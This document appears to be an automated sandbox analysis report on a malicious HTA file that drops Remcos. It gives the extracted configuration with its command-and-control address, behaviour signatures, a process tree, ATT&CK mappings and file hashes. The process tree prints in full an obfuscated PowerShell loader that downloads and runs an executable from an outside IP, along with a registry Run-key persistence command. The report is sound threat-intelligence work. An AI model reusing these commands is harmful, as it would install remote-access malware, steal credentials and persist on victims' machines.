Analysis
-
max time kernel
147s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
30-09-2024 17:57
General
-
Target
c443d03e485232a860b726fc83593004.hta
-
Size
115KB
-
MD5
c443d03e485232a860b726fc83593004
-
SHA1
6b556d04962638694402d15b7fa24b6bd6b1d1f4
-
SHA256
f99757c98007da241258ae12ec0fd5083f0475a993ca6309811263aad17d4661
-
SHA512
3a7201a36b2875c59db6e41369f52c941cd5d0d51bf90fca31abf05f71c76a7d5a6305667649ae8d2f63a3951a44643402853c096b07143531eaa6f6c5bb7c34
-
SSDEEP
96:Ea+M73rNp6fEVNp60WU1Qgr8l+Qu3i9pNp6R6Np6Er5BfqVNp61AT:Ea+Q35puEnp08QgocyNpJpxCnpxT
Malware Config
Extracted
remcos
Rem_doc2
107.173.4.16:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-DSGECX
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Detected Nirsoft tools 7 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 17 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c443d03e485232a860b726fc83593004.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zq2z2klv\zq2z2klv.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC091.tmp" "c:\Users\Admin\AppData\Local\Temp\zq2z2klv\CSC227648FBE9514C26B08739284B2B5F5.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Vaccinerende.exe"C:\Users\Admin\AppData\Local\Temp\Vaccinerende.exe"6⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"8⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
C:\Users\Admin\AppData\Local\Temp\Vaccinerende.exeC:\Users\Admin\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\Admin\AppData\Local\Temp\sqmkt"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\Vaccinerende.exeC:\Users\Admin\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\Admin\AppData\Local\Temp\dsrdufsf"7⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\Vaccinerende.exeC:\Users\Admin\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\Admin\AppData\Local\Temp\fmxnvxdgvhs"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD559de8a9d3b4137a4ec42d800eba4a047
SHA1e2eb2b5cd558cabd95a8478219fa0734e19a628e
SHA25671e22d8eee5b202f5b9d33f17d16e607be5a1927d15d3f80a89f44c8a75cc81a
SHA51249268d2276c7bd54dc0a96fffe737a897b28d0e57aa0a3d95ff3321c0cf8fcfefa8bd5c1b695cec0a75e48096fffbd81977fffb7e6ad19916925878458a0f527
-
Filesize
19KB
MD56cdb2720172bd5c98820f692640b7c08
SHA1839a6ea7d0e8aca9d52976c38937225826e53779
SHA256a65855e154484a8e1a064cb6d09f717cad91c6f0aa0e718b717606ef9c6e3c94
SHA51212f3f03e2c8b92ab3aa55340cc2ac60a1315c3c2a2df31d13d47291bf40ae20b60426d1d778ff6ff8a0630b189814b2b8862f029b7c4f75baa34edaaa03b6b3a
-
Filesize
1KB
MD5d749c1309111732c4a8fa92dbe871c34
SHA14cbb31feaef274d6113bc29987e900ebfd7ff6e9
SHA25668fb9ff3712d7e83b218d79ea7d5bea9055593972e329e8ca1e94e6bd4bd830e
SHA512a6a2029dbc9dfdaac32536bb16d461f1791cb06379bfb8b03622a45e6d49628aa030cf8a9ff1e818a21f11a517d14be4ac562baba354f78beb374ef4df6f95c3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD518db1829b27eaeed163c211f5d179d72
SHA14442332494cba1e012f8876ecac42126ba995bc6
SHA256610c5ee3f0e63441521d26bc477c9618a4c5f86e93d31b31890680c69e3ecc3d
SHA512123d68b2c84f7a52d15faa212c06f33b04a55585e2aeb16bb14df95b18c0bcf31933e5bf0c736c90bc054b9527fccb046540d3302a0f149ebeed7c6bcca0b986
-
Filesize
3KB
MD5fb8b8d2b359b70faf3041d602e61b1e6
SHA1175c93c315c6bdabdc1abab788ba4d99ec55952f
SHA256a5ffdb0b1fff68aeb31e495e142bc0dc01841865e9bcfd0400cb89777b8a53a0
SHA51259762a8684905f873a064018f719e1e2ee01c17f611a246be75dffe254efdccc64bac1746c986afff9e9f51387d0c638876af3a71f745971180c638d575f6534
-
Filesize
967KB
MD5450228d72f9f726b645c55bbbc6db905
SHA1b26075c51a4681f2ff7407188f5e9480545a7aca
SHA2569124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
SHA5124795d090447d237cbe1a044ffe78e8cd0c9be358df778673b4713eab2c324056a7701d22b827b95b2413845089fa71ac81a4f47cc8bcdbabad34845e64b4e090
-
Filesize
52KB
MD5552ed0904239d64db1895620b38dc799
SHA18a6a6c6efd31b04c716cde1783b45783f2843e20
SHA256d4d98fdbe306d61986bed62340744554e0a288c5a804ed5c924f66885cbf3514
SHA51221f283ac39223437470036ec08eb01bf40c4a0c45ea5b94bb4d902cf66923db4d14641ce68370d240ab2b213527552dfde13eb1ff4b21a0bbf0c1ee6aed7ade7
-
Filesize
349KB
MD514c1d52f24f29389597b36dcfc90b95a
SHA1a2578253f17b5f0ef989965dcb74aebb60763b2d
SHA256f9b744d0223efe3c01c94d526881a95523c2f5e457f03774dd1d661944e60852
SHA5124dde50c0b37e51b944a7a61866730e53e96773e28c35260dcae1eb38805251c3ba8e72c5d33ae2cb8d7486a4d3c6c180ec4560e3c20a6c535ca3a70aac158710
-
Filesize
652B
MD5b5fba7a312e2e3fe95362cd329b377e9
SHA1d99316b53ed6e596e96f9230db1a5cf1be726692
SHA256d3a53c57fd36b72182c2381cfc04b14f3aa3332a0a1204b0291a9301470f87c9
SHA512fc04bfbf1b749cb4698e96766cbdd60e014148ec285d489f0af05588a2391a8f43f485585f54e28f006736453aaa2fca7a13580bb63ede9b7cc1fc04f3c67cb9
-
Filesize
474B
MD5ed8b0b366b8fd7bdf35fcddb6a6fc768
SHA1f333be6ecec2ac5315dc3cb28ffe6202e6c3e142
SHA256f179dbf6f56665e7020a3cf42a5150aed8a15253ccbcf368cdc526c88d90d99b
SHA5121ace461d8af56f8002e38eb8274f86c026abfbfbd851c93d878d9a211ee727005b98c7236f43e1497c0a654ba45dc87ab6ed3ec49c77b3a3013e771381f523ce
-
Filesize
369B
MD507e4e43e02555c28d3b43d0ea5a68b2b
SHA199d1344cd092f7f5a25a64abacf0fb405ffcee1d
SHA2564d5cc6c8dbce75dc2148c52edfb79415f7cfbb178e1b54dd7e4427086f0da79d
SHA512d52195a1dbb4d02720abb1370c4b0c819e7ee094704a8d09a1a6dae81f6851eed47ba03d5f26c18195e03fc18502712e1739d2ce69ef8d3c46fd4c64de43bb45
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
168KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
79.3MB
-
Filesize
144KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
18.3MB
-
Filesize
652KB
-
Filesize
120KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
68KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
200KB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB